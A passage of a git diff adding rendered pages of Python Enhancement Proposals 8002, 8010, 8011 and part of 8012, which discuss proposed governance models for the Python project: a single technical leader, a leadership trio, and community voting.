Senior members of Engineering and PM teams for a feature are expected to +make decisions in the spirit of the direction set by their CVP. Teams +have regular meetings with their CVP to discuss recent decisions and +ensure consistency. Decisions that are not obviously in line with CVP +expectations are escalated to the controversial process.

+
+
+

Controversial decision process

+

When decisions require cross-team coordination, or do not obviously +align with previous CVP guidance, teams will escalate decision making. +These often include decisions that involve changing direction, +attempting to reach a new or different group of users, deprecating and +removing significant features (or on a short timeframe), or changes that +require quick releases.

+

In general, CVPs are not intimately familiar with all aspects of the +feature team’s work. As a result, the feature team must provide both a +recommendation and sufficient context for the decision that the CVP can +decide without additional knowledge. Most of the time, the first +attempt results in a series of questions from the CVP, which the team +will research, answer and attempt the decision again at a later date.

+

Common questions asked by CVPs are:

+
    +
  • how many users are affected by this decision?
  • +
  • what is the plan for minimizing impact on current users?
  • +
  • how will the change be “sold”/described to potential users?
  • +
+

CVPs are expected to have a strong understanding of the entire field, so +that they can evaluate some questions for themselves, such as:

+
    +
  • what similar decisions have been made by other projects within Microsoft?
  • +
  • what other projects have plans that may impact this decision?
  • +
  • what similar decisions have been made by projects outside Microsoft?
  • +
  • do users need it?
  • +
  • is it in line with the direction set by their EVP?
  • +
+

Decisions made by CVPs are generally arbitrary and final, though they +typically will provide their rationale.

+
+
+

Planning a new release

+

Releases involve coordinating a number of feature teams, and so rarely +attempt to include input from all teams. A schedule will be determined +based on broader ecosystem needs, such as planned events/conferences or +opportunities to take advantage of media attention.

+

Teams are informed of the release date, the theme of the release, and +make their own plans around it following the above decision making +process. Changing the release date is considered a controversial +decision.

+
+
+
+

Acknowledgements

+

Thank you to Alex Crichton from the Rust team for an extensive explanation of how the +core team governs the project.

+

Jeremy Stanley, Chris Dent, Julia Kreger, Sean McGinnis, Emmet Hikory, +and Thierry Carrez contributed to the OpenStack section.

+

The Project Jupyter Steering Council created the Main Governance Document for +Project Jupyter, and Carol Willing summarized the key points of that document +for the Jupyter section.

+

Thank you to Carl Meyer from the Django team for explanation how their +project’s governance is set up.

+

The TypeScript and Swift sections were created after conversations with +Joe Pamer and Vlad Matveev. Thanks!

+

Answers about the Astropy project were kindly contributed, in significant +detail, by Erik Tollerud and reviewed by other members of the project.

+
+
+

Annex 1: Template questions

+

The following set of questions was used as a template to guide evaluation and +interaction with the surveyed projects:

+
    +
  1. Do you have any open documentation on how the governance model is set up?
  2. +
  3. How does the process look like in practice?
      +
    • Who are the key people?
    • +
    • What “special statuses” can contributors have?
    • +
    • How are they elected/how are the statuses assigned?
    • +
    • How are regular decisions made?
    • +
    • How are controversial decisions made?
    • +
    • Is there a voting mechanism? how does it work? how often do votes actually happen?
    • +
    • Is there a veto mechanism? how often was it actually used?
    • +
    +
  4. +
  5. How do you like the process?
      +
    • Which parts work well?
    • +
    • Which parts could work better?
    • +
    • When it doesn’t work well, how does it look like?
    • +
    • What would you change if it were only up to you?
    • +
    +
  6. +
  7. Related project work:
      +
    • How do you decide when a release happens and what goes into it?
    • +
    • How do you decide who gets commit access?
    • +
    • Where do you hold discussions? (GitHub, mailing lists, face-to-face meetings, and so on)
    • +
    • Do you have a RFC/PEP-like process?
    • +
    • Who has access to those discussion channels?
    • +
    • How is this access granted/revoked?
    • +
    • Who moderates those discussions?
    • +
    • Do you (and how) censure participants and how?
    • +
    +
  8. +
  9. Process evolution
      +
    • How did this process evolve historically?
    • +
    • How can it be changed in the future?
    • +
    +
  10. +
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-8002.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-8010/index.html b/pep-8010/index.html new file mode 100644 index 00000000000..44227ad552d --- /dev/null +++ b/pep-8010/index.html @@ -0,0 +1,405 @@ + + + + + + + + PEP 8010 – The Technical Leader Governance Model | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 8010 – The Technical Leader Governance Model

+
+
Author:
+
Barry Warsaw <barry at python.org>
+
Status:
+
Rejected
+
Type:
+
Informational
+
Topic:
+
Governance
+
Created:
+
24-Aug-2018
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes a continuation of the singular technical project +leader model, euphemistically called the Benevolent Dictator For Life (BDFL) +model of Python governance, to be henceforth called in this PEP the +Gracious Umpire Influencing Decisions Officer (GUIDO). This change in +name reflects both the expanded view of the GUIDO as final arbiter for +the Python language decision making process in consultation with the +wider development community, and the recognition that “for life” while +perhaps aspirational, is not necessarily in the best interest of the +well-being of either the language or the GUIDO themselves.

+

This PEP describes:

+
    +
  • The rationale for maintaining the singular technical leader model
  • +
  • The process for how the GUIDO will be selected, elected, retained, +recalled, and succeeded;
  • +
  • The roles of the GUIDO in the Python language evolution process;
  • +
  • The term length of service;
  • +
  • The relationship of the GUIDO with a Council of Pythonistas (CoP) +that advise the GUIDO on technical matters;
  • +
  • The size, election, and roles of the CoP;
  • +
  • The decision delegation process;
  • +
  • Any changes to the PEP process to fit the new governance model;
  • +
+

This PEP does not name a new BDFL. Should this model be adopted, it +will be codified in PEP 13 along with the names of all officeholders +described in this PEP.

+
+
+

PEP Rejection

+

PEP 8010 was rejected by a core developer vote +described in PEP 8001 on Monday, December 17, 2018.

+

PEP 8016 and the governance model it describes were chosen instead.

+
+
+

Open discussion points

+

Various tweaks to the parameters of this PEP are allowed during the +governance discussion process, such as the exact size of the CoP, term +lengths of service, and voting procedures. These will be codified by +the time the PEP is ready to be voted on.

+

The voting procedures and events described in this PEP will default to +the voting method specified in PEP 8001, although as that PEP is still +in discussion at the time of this writing, this is subject to change.

+

It is allowed, and perhaps even expected, that as experience is gained +with this model, these parameters may be tweaked as future GUIDOs are +named, in order to provide for a smoother governing process.

+
+
+

Why a singular technical leader?

+

Why this model rather than any other? It comes down to “vision”. +Design by committee has many known downsides, leading to a language +that accretes new features based on the varied interests of the +contributors at the time. A famous aphorism is “a camel is a horse +designed by committee”. Can a language that is designed by committee +“hang together”? Does it feel like a coherent, self-consistent +language where the rules make sense and are easily remembered?

+

A singular technical leader can promote that vision more than a +committee can, whether that committee is small (e.g. 3 or 5 persons) +or spans the entire Python community. Every participant will have +their own vision of what “Python” is, and this can lead to indecision +or illogical choices when those individual visions are in conflict. +Should CPython be 3x faster or should we preserve the C API? That’s a +very difficult question to get consensus on, since neither choice is +right or wrong. But worse than making the wrong decision might be +accepting the status quo because no consensus could be found.

+
+
+

Flexibility

+

Degrees of flexibility are given to both the GUIDO and CoP by way of +underspecification. This PEP describes how conflicts will be +resolved, but expects all participants, including core developers, +community members, and office holders, to always have the best +interest of Python and its users at heart. The PEP assumes that +mutual respect and the best intentions will always lead to consensus, +and that the Code of Conduct governs all interactions and discussions.

+
+
+

The role of the GUIDO

+

One of the most important roles of the GUIDO is to provide an +overarching, broad, coherent vision for the evolution of the Python +language, spanning multiple releases. This is especially important +when decision have lasting impact and competing benefits. For +example, if backward incompatible changes to the C API leads to a 2x +improvement in Python performance, different community members will +likely advocate convincingly on both sides of the debate, and a clear +consensus may not emerge. Either choice is equally valid. In +consultation with the CoP, it will be the GUIDO’s vision that guides +the ultimate decision.

+

The GUIDO is the ultimate authority for decisions on PEPs and other +issues, including whether any particular change is PEP-worthy. As is +the case today, many –in fact perhaps most– decisions are handled by +discussion and resolution on the issue tracker, merge requests, and +discussion forums, usually with input or lead by experts in the +particular field. Where this operating procedure works perfectly +well, it can continue unchanged. This also helps reduce the workload +on the CoP and GUIDO, leaving only the most important decisions and +broadest view of the landscape to the central authority.

+

Similarly, should a particular change be deemed to require a PEP, but +the GUIDO, in consultation with the CoP, identifies experts that have +the full confidence to make the final decision, the GUIDO can name a +Delegate for the PEP. While the GUIDO remains the ultimate authority, +it is expected that the GUIDO will not undermine, and in fact will +support the authority of the Delegate as the final arbiter of the PEP.

+

The GUIDO has full authority to shut down unproductive discussions, +ideas, and proposals, when it is clear that the proposal runs counter +to the long-term vision for Python. This is done with compassion for +the advocates of the change, but with the health and well-being of all +community members in mind. A toxic discussion on a dead-end proposal +does no one any good, and they can be terminated by fiat.

+

To sum up: the GUIDO has the authority to make a final pronouncement +on any topic, technical or non-technical, except for changing to the +governance PEP itself.

+
+
+

Authority comes from the community

+

The GUIDO’s authority ultimately resides with the community. A rogue +GUIDO that loses the confidence of the majority of the community can +be recalled and a new vote conducted. This is an exceedingly rare and +unlikely event. This is a sufficient stopgap for the worst-case +scenario, so it should not be undertaken lightly. The GUIDO should +not fear being deposed because of one decision, even if that decision +isn’t favored by the majority of Python developers. Recall should be +reserved for actions severely detrimental to the Python language or +community.

+

The Council of Pythonistas (see below) has the responsibility to +initiate a vote of no-confidence.

+
+
+

Length of service and term limits

+

The GUIDO shall serve for three Python releases, approximately 4.5 +years given the current release cadence. If Python’s release cadence +changes, the length of GUIDO’s term should change to 4.5 years rounded +to whole releases. How the rounding is done is left to the potential +release cadence PEP. After this time, a new election is held +according to the procedures outlined below. There are no term limits, +so the GUIDO may run for re-election for as long as they like.

+

We expect GUIDOs to serve out their entire term of office, but of +course, Life Happens. Should the GUIDO need to step down before their +term ends, the vacancy will be filled by the process outlined below as +per choosing a new GUIDO. However, the new GUIDO will only serve for +the remainder of the original GUIDO’s term, at which time a new +election is conducted. The GUIDO stepping down may continue to serve +until their replacement is selected.

+

During the transition period, the CoP (see below) may carry out the +GUIDO’s duties, however they may also prefer to leave substantive +decisions (such as technical PEP approvals) to the incoming GUIDO.

+
+
+

Choosing a GUIDO

+

The selection process is triggered whenever a vacancy exists for a new +GUIDO, or when the GUIDO is up for re-election in the normal course of +events. When the selection process is triggered, either by the GUIDO +stepping down, or two months before the end of the GUIDO’s regular +term, a new election process begins.

+

For three weeks prior to the vote, nominations are open. Candidates +must be chosen from the current list of core Python developers. +Non-core developers are ineligible to serve as the GUIDO. Candidates +may self-nominate, but all nominations must be seconded. Nominations +and seconds are conducted as merge requests on a private repository.

+

Once they accept their nomination, nominees may post short position +statements using the same private repository, and may also post them +to the committers discussion forum. Maybe we’ll even have debates! +This phase of the election runs for two weeks.

+

Core developers then have three weeks to vote, using the process +described in PEP 8001.

+
+
+

The Council of Pythonistas (CoP)

+

Assisting the GUIDO is a small team of elected Python experts. They +serve on a team of technical committee members. They provide insight +and offer discussion of the choices before the GUIDO. Consultation +can be triggered from either side. For example, if the GUIDO is still +undecided about any particular choice, discussions with the CoP can +help clarify the remaining issues, identify the right questions to +ask, and provide insight into the impact on other users of Python that +the GUIDO may not be as familiar with. The CoP are the GUIDO’s +trusted advisers, and a close working relationship is expected.

+

The CoP shall consist of 3 members, elected from among the core +developers. Their term runs for 3 years and members may run for +re-election as many times as they want. To ensure continuity, CoP +members are elected on a rotating basis; every year, one CoP member is +up for re-election.

+

In order to bootstrap the stagger for the initial election, the CoP +member with the most votes shall serve for 3 years, the second most +popular vote getter shall serve for 2 years, and CoP member with the +least number of votes shall serve initially for 1 year.

+

All ties in voting will be broken with a procedure to be determined in +PEP 8001.

+

The nomination and voting process is similar as with the GUIDO. There +is a three-week nomination period, where self-nominations are allowed +and must be seconded, followed by a period of time for posting +position statements, followed by a vote.

+

By unanimous decision, the CoP may begin a no-confidence vote on the +GUIDO, triggering the procedure in that section.

+
+
+

No confidence votes

+

As mentioned above, the CoP may, by unanimous decision, initiate a +vote of no-confidence in the GUIDO. This process should not be +undertaken lightly, but once begun, it triggers up to two votes. In +both cases, voting is done by the same procedure as in PEP 8001, and +all core developers may participate in no confidence votes.

+

The first vote is whether to recall the current GUIDO or not. Should +a super majority of Python developers vote “no confidence”, the GUIDO +is recalled. A second vote is then conducted to select the new GUIDO, +in accordance with the procedures for initial section of this office +holder. During the time in which there is no GUIDO, major decisions +are put on hold, but normal Python operations may of course continue.

+
+
+

Day-to-day operations

+

The GUIDO is not needed for all – or even most – decisions. Python +developers already have plenty of opportunity for delegation, +responsibility, and self-direction. The issue tracker and pull +requests serve exactly the same function as they did before this +governance model was chosen. Most discussions of bug fixes and minor +improvements can just happen on these forums, as they always have.

+
+
+

PEP considerations

+

The GUIDO, members of the CoP, and anyone else in the Python community +may propose a PEP. Treatment of the prospective PEP is handled the +same regardless of the author of the PEP.

+

However, in the case of the GUIDO authoring a PEP, an impartial PEP +Delegate should be selected, and given the authority to accept or +reject the PEP. The GUIDO should recuse themselves from the decision +making process. In the case of controversial PEPs where a clear +consensus does not arrive, ultimate authority on PEPs authored by the +GUIDO rests with the CoP.

+

The PEP propose is further enhanced such that a core developer must +always be chose as the PEP Shepherd. This person ensure that proper +procedure is maintained. The Shepherd must be chosen from among the +core developers. This means that while anyone can author a PEP, all +PEPs must have some level of sponsorship from at least one core +developer.

+
+
+

Version History

+

Version 2

+
+
    +
  • Renamed to “The Technical Leader Governance Model”
  • +
  • “singular leader” -> “singular technical leader”
  • +
  • The adoption of PEP 8001 voting procedures is tentative until that +PEP is approved
  • +
  • Describe what happens if the GUIDO steps down
  • +
  • Recall votes require a super majority of core devs to succeed
  • +
+
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-8010.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-8011/index.html b/pep-8011/index.html new file mode 100644 index 00000000000..5f56791e941 --- /dev/null +++ b/pep-8011/index.html @@ -0,0 +1,501 @@ + + + + + + + + PEP 8011 – Python Governance Model Lead by Trio of Pythonistas | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 8011 – Python Governance Model Lead by Trio of Pythonistas

+
+
Author:
+
Mariatta <mariatta at python.org>, Barry Warsaw <barry at python.org>
+
Status:
+
Rejected
+
Type:
+
Informational
+
Topic:
+
Governance
+
Created:
+
24-Aug-2018
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes a governance model for the Core Python development community, +led by a trio of equally authoritative leaders. The Trio of Pythonistas +(ToP, or simply Trio) is tasked with making final decisions for the language. +It differs from PEP 8010 by specifically not proposing a central singular leader, +but instead a group of three people as the leaders.

+

This PEP also proposes a formation of specialized workgroups to assist the leadership +trio in making decisions.

+

This PEP does not name the members of the Trio. Should this model be adopted, +it will be codified in PEP 13 along with the names of all officeholders +described in this PEP.

+

This PEP describes:

+
    +
  • The role and responsibilities of the Trio
  • +
  • Guidelines of how trio members should be formed
  • +
  • Reasoning of the group of three, instead of a singular leader
  • +
  • Role and responsibilities of Python core developers to the trio
  • +
  • Sustainability considerations
  • +
  • Diversity and inclusivity considerations
  • +
+
+
+

PEP Rejection

+

PEP 8011 was rejected by a core developer vote +described in PEP 8001 on Monday, December 17, 2018.

+

PEP 8016 and the governance model it describes were chosen instead.

+
+
+

Open discussion points

+

Various tweaks to the parameters of this PEP are allowed during the governance +discussion process, such as the exact responsibilities of the Trio, term lengths +of service, voting procedures, and trio disbandment. +These will be codified by the time the PEP is ready to be voted on.

+

It is allowed, and perhaps even expected, that as experience is gained with this +model, these parameters may be tweaked in order to provide for a smoother +governing process. The process for tweaking these parameters will generally +be the same voting process as described in PEP 8001.

+
+
+

Roles and responsibilities of the leadership trio

+
    +
  • Be open, considerate, respectful. In other words, adhering to The PSF’s code of conduct.
  • +
  • Pronounce on PEPs, either as a team, or individually if the other trio members agree.
  • +
  • Provide vision and leadership for Python, the programming language and the community.
  • +
  • Understand their own limitation, and seek advice whenever necessary.
  • +
  • Provide mentorship to the next generation of leaders.
  • +
  • Be a Python core developer
  • +
  • Be a voting member of The PSF (one of Contributing / Manager / Fellow / Supporter). [2]
  • +
  • Understand that Python is not just a language but also a community. They need +to be aware of issues in Python not just the technical aspects, but also +other issues in the community.
  • +
  • Facilitate the formation of specialized working groups within Core Python. +See “formation of specialized working groups” section below.
  • +
  • Set good example of behavior, culture, and tone to Python community. +Just as Python looks at and learn from other communities for inspiration, other +communities will look at Python and learn from us.
  • +
+
+
+

Authority of the trio

+

To be clear, in case any dispute arises: the trio has the final +authority to pronounce on PEPs (except for the governance PEP), to +decide whether a particular decision requires a PEP, and to resolve +technical disputes in general. The trio’s authority does not include +changing the governance itself, or other non-technical disputes that +may arise; these should be handled through the process described in +PEP 8001.

+
+
+

What are NOT considered as the role responsibilities of the trio

+

The following are not the expected out of the trio, however they can do these if they wish.

+
    +
  • They are not always the ones coming up with all the ideas, vision, problems to +solve, and what not. The trio will be open and accepting suggestions from core developers +and community.
  • +
  • Day to day bug reports do not require the trio to intervene. Any core devs are able +to make decisions, but will defer to the respective focused workgroups, and +will eventually defer to the trio when there are major disagreements among core developers.
  • +
  • Does not run / decide on Python language summit and its logistics.
  • +
  • Does not run / decide on Python core sprint and its logistics.
  • +
  • Does not handle CoC cases. Those are responsibilities of the PSF CoC workgroup, +but will speak out if they witness those cases.
  • +
  • Does not make decisions about other Python implementations (Cython, IronPython, etc).
  • +
  • Does not run / decide on Python conferences and its logistics.
  • +
  • Not an evangelist of Python. The trio is not expected to preach/advertise for +Python. They can if they want to, but not expected.
  • +
  • Not an educator of Python. The trio is not expected to be the ones teaching/writing +about Python. They can if they want to, but not expected.
  • +
  • The trio is not expected to be available 24/7, 365 days a year. They are free +to decide for themselves their availability for Python.
  • +
  • Not a PEP editor.
  • +
+
+
+

Guidelines for the formation of the trio

+

The success of this governance model relies on the members of the trio, and the +ability of the trio members to collaborate and work well together.

+

The three people need to have similar vision to Python, and each can have +different skills that complement one another.

+

With such a team, disagreements and conflict should be rare, but can still happen. +We will need to trust the people we select that they are able to resolve this among +themselves.

+

When it comes to select the members of the trio, instead of nominating various +individuals and choosing the top three, core developers will nominate trios +and vote for groups of threes who they believe can form this united trio. There +is no restriction that an individual can only be nominated in one slate.

+

This PEP will not name or nominate anyone into the trio.

+

Only once this PEP is accepted, any active core developers (who are eligible to vote) +can submit nomination of groups of three.

+

Once this PEP is accepted and core devs have submitted their nominations, voting +can begin, and the voting mechanism described in PEP 8001 will be used.

+

Qualities desired out of the trio:

+
    +
  • Be a Python core developer.
  • +
  • Be a voting PSF member (one of Contributing / Manager / Fellow / Supporter). [2]
  • +
  • Be a member of the community with good standing.
  • +
  • Adhere to The PSF’s code of conduct (Be open, considerate, and respectful). [1]
  • +
  • Be willing to accept the said roles and responsibilities.
  • +
  • Able to communicate and articulate their thoughts effectively.
  • +
+

The following are not requirements when considering someone into the trio:

+
    +
  • “Experience being a BDFL of something” is not a requirement.
  • +
  • “Be a genius” is not a requirement.
  • +
+
+

Diversity and inclusivity

+

The core Python development team fully supports the Python Software Foundation’s +diversity statement, and welcomes participation and contribution from people +from diverse backgrounds. When nominating people to be part of the trio, +Python core developers will take every effort into including members from +underrepresented group into consideration.

+

Ideally, nomination should include and reflect the diversity of core Python +contributors.

+
+
+

Sustainability

+

Lack of employer support or lack of luxury of free time should not be a factor +when identifying who should be in a trio. If there are individuals who the core +devs have identified as having the necessary skills for being a member of the +trio, but they are unable to do it because of lack of time, lack of financial +support, then we should open discussion with The PSF or other parties into +providing the needed support.

+
+
+

Additional guidelines

+

When nominating someone other than yourself, please first ask privately if +they are ok with being nominated, and if they are ok with nominated in that +group of three. This is so people don’t feel pressured to accept nomination +just because it happens publicly.

+
+
+
+

Why not other governance model

+

Core Python community are familiar with the singular BDFL model for over +two decades, it was a model that has “worked” for Python. Shifting to a completely +different model all of the sudden, could be disruptive to the stability of +the community. However, the community can continue to evolve +in the future.

+

If this PEP is chosen, it is not meant to be the only governance model for Python +going forward.

+

This PEP proposed a transition into a community led by a group of people (although small), +while also introducing the concept of additional specialized workgroups.

+
+
+

Why not more than three

+

Too many chefs spoil the soup.

+

The goal of having a leadership team is for team Python core developers to be +able to come to consensus and decisions. The larger the leadership team is, +the more difficult it will be in coming up with decision.

+

This is also for the benefit of the members of the trio. Learning to +collaborate with other people in a team is not something that happen organically +and takes a lot of effort. It is expected that members of the trio will be part +of the team for a long-term period. Having to deal with two other people is +probably difficult enough. We want the trio to be able to do their duties and +responsibilities as efficient as possible.

+

The more people in the group, the more difficult it is to try to come up +with time to meet, discuss, and coming up with decision.

+
+
+

Roles and responsibilities of Python Core Developers to the trio

+
    +
  • Be open, considerate, and respectful. In other words, adhere to The PSF’s Code of Conduct
  • +
  • Decisions and pronouncements made by individual members of the trio are to +be seen as authoritative and coming from the trio.
  • +
  • Once the trio has pronounced a decision, core devs will be supportive, even if +they were not supportive in the beginning (before the trio made such decision)
  • +
  • Continue with day-to-day decision making in the bug tracker, and defer to the +trio if there is major disagreement
  • +
  • Python core developers do not handle CoC cases, those are responsibilities of +the CoC workgroup, but will speak out if they witness those cases
  • +
  • Aware that they are part of the larger Python community, not just the technical +aspect of it.
  • +
  • Be a voting PSF member (one of Contributing / Manager / Fellow / Supporter).
  • +
  • Set good example of behavior, culture, and tone to Python community.
  • +
+
+
+

Term Limit

+

The trio is not expected to serve for life, however a longer term is +desired. The purpose of longer term service is to avoid unnecessary churns of +needing to “elect”, and to provide stability and consistency in the language and +the community.

+

Currently, Python release managers hold their position for 5 years (one release +cycle), and that seems to work so far. Therefore, this PEP proposes that the +trio hold their position for 5 years.

+
+
+

Succession planning of the trio (open for discussion)

+

The trio should notify core devs of their intention to disband/retire/quit +from their roles at least one year in advance, to allow for them to actively +mentor and train the next generation of successors, and to avoid power vacuum.

+

The trio do not necessarily have to be the ones choosing who the next leaders will +be.

+

This PEP does not enforce that the same governance model be chosen for +the next generation. Python as language and community can continue to evolve. +By giving one year advance notice to disband, the trio is giving the core +Python community an opportunity to reflect on the success/failure of +this governance model, and choose a different governance model if needed.

+

However, the next governance model and leaders should be chosen/elected within +one year after the trio announced their desire to disband.

+

If it was decided to continue with this model of governance, the next +generation of trio will be nominated and elected similar to how the first +trio were nominated/chosen.

+

The trio should act as advisor/mentor to the next generation chosen +leaders for at least X months.

+

Since future trio will be chosen out of Python core developers, +it will make sense for future Python core developers to possess some but +not necessarily all, qualities of the trio as laid out in this PEP.

+

Therefore, the guidelines for selecting trio members can also be used +as guidelines when identifying future Python core developers.

+
+

Scenario if one member of the trio needs to quit

+

Effective governance models provide off-ramps or temporary breaks for leaders +who need to step down or pause their leadership service.

+

What if one member of the chosen trio has to quit, for unforeseen reasons?

+

There are several possible options:

+
    +
  • The remaining duo can select another member to fill in the role
  • +
  • The trio can choose to disband, core developers can nominate other trios
  • +
  • Core developers can choose a different governance model
  • +
+

Since the trio were elected as a slate and so the loss of one breaks that unit +that was elected. Therefore, a new election should be held.

+
+
+
+

Formation of working groups/area of expertise/ownership (previously BDFL delegate)

+

(Open for discussion).

+

Certain areas and topic of Core Python and Python community require leaders +with specific skills of specialty. It will be recommended that there will be several +working groups with more authority in that specific area to assist the trio +in making decisions.

+

The role of these “specialized work groups/council” is to be the final decision +maker for controversial discussions that arise in their respective areas.

+

These working groups should be small (3-5 people), for similar reasons that the +leadership trio is a small group.

+

These working groups should consist of both Python core developers and external +experts. This is to ensure that decision made does not favor only Python core +developers.

+

Python Core developers will defer decisions to these working groups on their +respective topic. However these groups will answer/defer to the trio.

+

These working groups can be selected and members voted only after this PEP gets +accepted.

+

If this PEP is accepted, the working group can be decided within a year or two +after the PEP’s acceptance.

+

When selecting members of these special work groups, the trio will take +every effort into including members from underrepresented group into consideration. +Ideally, the workgroup members should include and reflect the diversity of +the wider Python community.

+

Members of this workgroup do not need to be a Python core developer, but they +need to be at least a basic member of the PSF [2].

+

These workgroup are active as long as the trio are active.

+

Several suggested working groups to start:

+
    +
  • Documentation of CPython
  • +
  • Security of CPython
  • +
  • Performance of CPython
  • +
+

The workgroup can be seen as having similar role as the previously known role +of “BDFL-delegate” or PEP czars. The difference is, instead of appointing a +single person as decision maker, there will be a small team of decision makers.

+

Another difference with the previous “BDFL-delegate” role, the group can be +active as long as the trio is active, as opposed to only when there is a PEP +that requires their expertise.

+

When the trio disbands, these workgroups are disbanded too.

+
+

Why these workgroups are necessary

+

This is an effort to ‘refactor the large role’ of the previous Python BDFL.

+
+
+
+

Affirmation as being a member of the PSF

+

This PEP proposes that core developers and the trio members self-certify +themselves as being a member of The PSF.

+

Being part of the PSF means being part of the Python community, and support +The PSF’s mission and diversity statement.

+

By being a member of The PSF, Python core developers declare their support for +Python and agree to the community Code of Conduct.

+

For more details of The PSF membership, see: PSF Membership FAQ [2].

+
+
+

Reasoning for choosing the name trio

+

Not to be confused with Python trio (an async library).

+

The “trio” is short and easy to pronounce, unlike other words that are +long and can have negative interpretations, like triad, trinity, triumvirate, +threesome, etc.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-8011.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-8012/index.html b/pep-8012/index.html new file mode 100644 index 00000000000..14523e28d72 --- /dev/null +++ b/pep-8012/index.html @@ -0,0 +1,605 @@ + + + + + + + + PEP 8012 – The Community Governance Model | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 8012 – The Community Governance Model

+
+
Author:
+
Łukasz Langa <lukasz at python.org>
+
Status:
+
Rejected
+
Type:
+
Informational
+
Topic:
+
Governance
+
Created:
+
03-Oct-2018
+
+
+
+
Table of Contents +
+
+

PEP Rejection

+

PEP 8012 was rejected by a core developer vote +described in PEP 8001 on Monday, December 17, 2018.

+

PEP 8016 and the governance model it describes were chosen instead.

+
+
+

Abstract

+

This PEP proposes a new model of Python governance based on consensus +and voting by the Python community. This model relies on workgroups to carry +out the governance of the Python language. This governance model works without +the role of a centralized singular leader or a governing council.

+

It describes how, when, and why votes are conducted for decisions affecting +the Python language. It also describes the criteria for voting eligibility.

+

Should this model be adopted, it will be codified in PEP 13.

+

This model can be affectionately called “The Least Worst Governance +Model” by its property that while far from ideal, it’s still the most +robust one compared to the others. Since avoiding issues inherent to +the other models is a paramount feature of the Community Governance +Model, we start the discussion a bit unusually: by rejecting the +other models.

+
+
+

Rejected Models

+
+

Let’s have another BDFL

+

This seems like a very attractive idea because it’s a model we know. +One Dictator to rule us all.

+
+

Challenge: There is no other Guido

+

There is no other single person with the unique skillset of Guido van +Rossum. Such a person would need to have the technical, communication, and +organizational experience to lead the project successfully. Specifically, the +person would need to:

+
    +
  • set and articulate a cohesive long-term vision for the project;
  • +
  • possess deep technical understanding of the runtime, the standard library, +and the wider third-party library context;
  • +
  • negotiate and resolve contentious issues in ways acceptable to all +parties involved;
  • +
  • have free time and possess the energy to sustain continuous involvement +over periods of years.
  • +
+
+
+

Risk: Malevolent Dictator For Life

+

What if we got somebody who is not as well suited for the position as +our first Dictator? There are possible scenarios in which this could +lead to severe consequences.

+

The Dictator could gather insufficient trust due to missing technical +depth, a “close” election, inconsistent vision, poor ability to deal +with conflict or burnout, and so on. Given a controversial decision +decided by the Dictator in a specific way, a Dictator with +insufficient trust may cause a split within the project.

+

The Dictator setup invites lobbying concentrated on a single person. +Unless that person is immune to leverage due to wealth, health, and +a stable life situation, this poses risk of malicious actors steering +the project from behind the curtain.

+

Finally, the Dictator coming from a particular part of the community +may put more weight on the needs and interests of that particular part +of the user base, alienating others.

+
+
+

Observation: We don’t actually need a Dictator

+

The irony of the Dictator model is that it requires an election. Better +yet, we need an election to even decide on which governance model to +use.

+

If we are already able solve two problems of this gravity via the +community process, why not keep using it for all subsequent decisions?

+
+
+

Risk: The warm and fuzzy feeling of a vague proposal

+

One last thing worth mentioning is that when a BDFL model is suggested, +it’s easy to bypass the criticism above by not mentioning who the BDFL +should be. That way the hopeful reader can project their best +expectations and wants onto the abstract BDFL, making the idea appear +more attractive. This is a mistake.

+

Without naming the BDFL in the model proposal we are not talking about +a concrete model. We can avoid asking and answering the hard questions. +We can imagine our best-case scenario, a candidate we’d like to serve +the role.

+

Omitting a name for the BDFL also puts the Community Model at an unfair disadvantage. +We already know the good, the bad, and the ugly of our core developer +group. It’s no platonic ideal, no perfect sphere with no friction. In +fact, we expect there to be a fair amount of friction and imperfections.

+

Thus, to fairly assess the BDFL model proposal, dear reader, you +should imagine the worst possible person within our team as that +BDFL. A concrete human being. Imagine it’s me.

+

Conclusion While this has been our history, without Guido, this model +does not serve the best interests of the language into the future.

+
+
+
+

Let’s have a Council

+

This group of people roughly shares the responsibilities of a Dictator. The +group can also be called a Triumvirate, a Quorum, Elders, Steering Committee, +and so on.

+
+

Risk: Dilution and confusion

+

This model favors a small group, between three and five people. +That way it shares most of the criticism with the Dictator model, +amplified. Having not one but, say, three people in position of power +dilutes responsibility while still providing high risk of lobbying, +insufficient trust, or alienating parts of the community.

+
+
+

Risk: Internal Conflict

+

Additionally, having multiple people share the responsibility of +governance creates ample opportunity for internal conflict, +inconsistent long-term vision of the project, and multiplies the +required continuous time involvement by its members (it’s no Quorum +if they can’t “reach quorum” due to other time commitments).

+

Just like with a frictionless spherical BDFL, reject ideas of +Councils without considering how would it work for you if that +Council consisted of three people you find inadequate for the role. +Imagine if I had two friends.

+

Most importantly, just like with a Dictator, we don’t need a Council. +By the time we had one, we would have already had two successful +elections. Why not keep voting?

+

Conclusion This model has similar risks like a Dictator, only worse.

+
+
+
+
+

Motivation

+

Now that we rejected the basics of other governance models, let’s talk why we +even need a governance model on top of a loosely defined group of committers.

+

Stability and Reliability We want to prevent single committers from +making wide-reaching changes that impact the future of the language or its +usability. Coherent vision and backwards compatibility are important in any +programming language, but they are doubly important for Python which is very +dynamic (e.g. has very complex backwards compatibility implications).

+

